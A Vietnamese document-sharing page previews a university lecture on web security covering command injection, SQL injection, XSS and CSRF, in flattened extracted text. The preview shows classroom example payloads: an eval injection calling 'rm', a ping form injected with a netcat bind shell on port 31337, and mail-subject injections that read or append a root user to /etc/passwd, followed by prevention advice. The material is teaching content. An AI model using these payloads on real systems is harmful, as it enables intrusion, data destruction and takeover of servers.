Báo cáo tài liệu vi phạm
Giới thiệu
Kinh doanh - Marketing
Kinh tế quản lý
Biểu mẫu - Văn bản
Tài chính - Ngân hàng
Công nghệ thông tin
Tiếng anh ngoại ngữ
Kĩ thuật công nghệ
Khoa học tự nhiên
Khoa học xã hội
Văn hóa nghệ thuật
Sức khỏe - Y tế
Văn bản luật
Nông Lâm Ngư
Kỹ năng mềm
Luận văn - Báo cáo
Giải trí - Thư giãn
Tài liệu phổ thông
Văn mẫu
THỊ TRƯỜNG NGÀNH HÀNG
NÔNG NGHIỆP, THỰC PHẨM
Gạo
Rau hoa quả
Nông sản khác
Sữa và sản phẩm
Thịt và sản phẩm
Dầu thực vật
Thủy sản
Thức ăn chăn nuôi, vật tư nông nghiệp
CÔNG NGHIỆP
Dệt may
Dược phẩm, Thiết bị y tế
Máy móc, thiết bị, phụ tùng
Nhựa - Hóa chất
Phân bón
Sản phẩm gỗ, Hàng thủ công mỹ nghệ
Sắt, thép
Ô tô và linh kiện
Xăng dầu
DỊCH VỤ
Logistics
Tài chính-Ngân hàng
NGHIÊN CỨU THỊ TRƯỜNG
Hoa Kỳ
Nhật Bản
Trung Quốc
Hàn Quốc
Châu Âu
ASEAN
BẢN TIN
Bản tin Thị trường hàng ngày
Bản tin Thị trường và dự báo tháng
Bản tin Thị trường giá cả vật tư
Tìm
Danh mục
Kinh doanh - Marketing
Kinh tế quản lý
Biểu mẫu - Văn bản
Tài chính - Ngân hàng
Công nghệ thông tin
Tiếng anh ngoại ngữ
Kĩ thuật công nghệ
Khoa học tự nhiên
Khoa học xã hội
Văn hóa nghệ thuật
Y tế sức khỏe
Văn bản luật
Nông lâm ngư
Kĩ năng mềm
Luận văn - Báo cáo
Giải trí - Thư giãn
Tài liệu phổ thông
Văn mẫu
NGÀNH HÀNG
NÔNG NGHIỆP, THỰC PHẨM
Gạo
Rau hoa quả
Nông sản khác
Sữa và sản phẩm
Thịt và sản phẩm
Dầu thực vật
Thủy sản
Thức ăn chăn nuôi, vật tư nông nghiệp
CÔNG NGHIỆP
Dệt may
Dược phẩm, Thiết bị y tế
Máy móc, thiết bị, phụ tùng
Nhựa - Hóa chất
Phân bón
Sản phẩm gỗ, Hàng thủ công mỹ nghệ
Sắt, thép
Ô tô và linh kiện
Xăng dầu
DỊCH VỤ
Logistics
Tài chính-Ngân hàng
NGHIÊN CỨU THỊ TRƯỜNG
Hoa Kỳ
Nhật Bản
Trung Quốc
Hàn Quốc
Châu Âu
ASEAN
BẢN TIN
Bản tin Thị trường hàng ngày
Bản tin Thị trường và dự báo tháng
Bản tin Thị trường giá cả vật tư
Thông tin
Tài liệu Xanh là gì
Điều khoản sử dụng
Chính sách bảo mật
0
Trang chủ
Công Nghệ Thông Tin
An ninh - Bảo mật
Bài giảng An ninh mạng - Bài 10: An toàn dịch vụ web - SQL injection, XSS, CSRF
Đang chuẩn bị liên kết để tải về tài liệu:
Bài giảng An ninh mạng - Bài 10: An toàn dịch vụ web - SQL injection, XSS, CSRF
Thúy Phượng
49
31
pdf
Không đóng trình duyệt đến khi xuất hiện nút TẢI XUỐNG
Tải xuống
Bài giảng An ninh mạng - Bài 10: An toàn dịch vụ web - SQL injection, XSS, CSRF. Bài này cung cấp cho sinh viên những nội dung gồm: tấn công dạng command injection; phòng chống; kịch bản tấn công SQLi; phân tích truy vấn trên cây cú pháp; tautology-based SQLi; cây cú pháp; một số kỹ thuật khai thác SQLi; . Mời các bạn cùng tham khảo! | BÀI 10. AN TOÀN DỊCH VỤ WEB SQL INJECTION XSS CSRF Bùi Trọng Tùng Viện Công nghệ thông tin và Truyền thông Đại học Bách khoa Hà Nội 1 1 1. TẤN CÔNG DẠNG COMMAND INJECTION Bùi Trọng Tùng Viện Công nghệ thông tin và Truyền thông Đại học Bách khoa Hà Nội 2 2 1 Command Injection Lợi dụng lỗ hổng không kiểm soát giá trị các đối số khi thực thi kịch bản servlet trên web server Không phân biệt được dữ liệu và mã nguồn trong đối số Ví dụ Website chứa servlet cung cấp tính năng tính toán biểu thức bất kỳ qua hàm eval http site.com calc.php in _GET exp Nội dung biểu thức được truyền eval ans . in . qua đối số exp. Ví dụ http site.com calc.php exp 1 1 Servlet thực thi như thế nào nếu truyền đối số như sau http site.com calc.php exp 10 system rm . 3 3 Command Injection Ví dụ khác 1. http site.com exec Client Server 2. Send page Ping for FREE Enter an IP address below Ô nhập dữ liệu Command Injection Ví dụ khác Client Server Send output t _REQUEST ip o shell_exec ping C 3 . t echo o Ping for FREE PHP exec program Enter an IP address below Command Injection Ví dụ khác 127.0.0.1 ls Client Server 2. Send page t _REQUEST ip o shell_exec ping C 3 . t echo o PHP exec program 7 7 Command Injection Ví dụ khác Thực thi shell ip 127.0.0.1 26 netcat -v - e bin bash -l -p 31337 amp submit submit netcat v e bin bash l p 31337 8 8 4 Command Injection Ví dụ khác Mã PHP để gửi email email _POST email subject _POST subject system mail email s subject lt tmp joinmynetwork Chèn mã thực thi khi truyền giá trị cho đối số http yourdomain.com mail.php email hacker@hackerhome.net amp subject foo lt usr passwd ls Hoặc http yourdomain.com mail.php email hacker@hackerhome.net amp subject foo echo evil 0 0 root bin sh quot gt gt etc passwd ls 9 9 Phòng chống Kiểm tra chỉ chấp nhận giá trị chứa các ký tự hợp lệ Ký tự nào là hợp lệ Phụ thuộc ngữ cảnh Làm sạch đầu vào input sanitization Xác định các ký tự đặc biệt không nên xuất hiện Thêm dấu đặt trước các ký tự đặc biệt Xóa các ký tự đặc biệt Có thể vượt .
TÀI LIỆU LIÊN QUAN
Bài giảng An ninh mạng máy tính - Chương 8: Các giao thức an ninh thông dụng (ThS. Lương Minh Huấn)
Bài giảng An ninh mạng máy tính - Chương 1: Tổng quan về an ninh mạng máy tính (ThS. Lương Minh Huấn)
Đề cương bài giảng học phần An ninh mạng
Bài giảng An ninh mạng – Chương 1: Giới thiệu (TS Nguyễn Đại Thọ)
Bài giảng An ninh mạng: Chương 1 - ThS. Trần Bá Nhiệm
Đề cương chi tiết bài giảng An ninh mạng
Bài giảng An ninh mạng máy tính - Chương 7: An ninh tầng giao vận (ThS. Lương Minh Huấn)
Bài giảng An ninh mạng: Bài 1 - Bùi Trọng Tùng
Bài giảng An ninh mạng - Chương 5: Bảo đảm an toàn mạng
Đề cương bài giảng học phần An ninh mạng: Chương 2 - Tấn công mạng máy tính
Đã phát hiện trình chặn quảng cáo AdBlock
Trang web này phụ thuộc vào doanh thu từ số lần hiển thị quảng cáo để tồn tại. Vui lòng tắt trình chặn quảng cáo của bạn hoặc tạm dừng tính năng chặn quảng cáo cho trang web này.
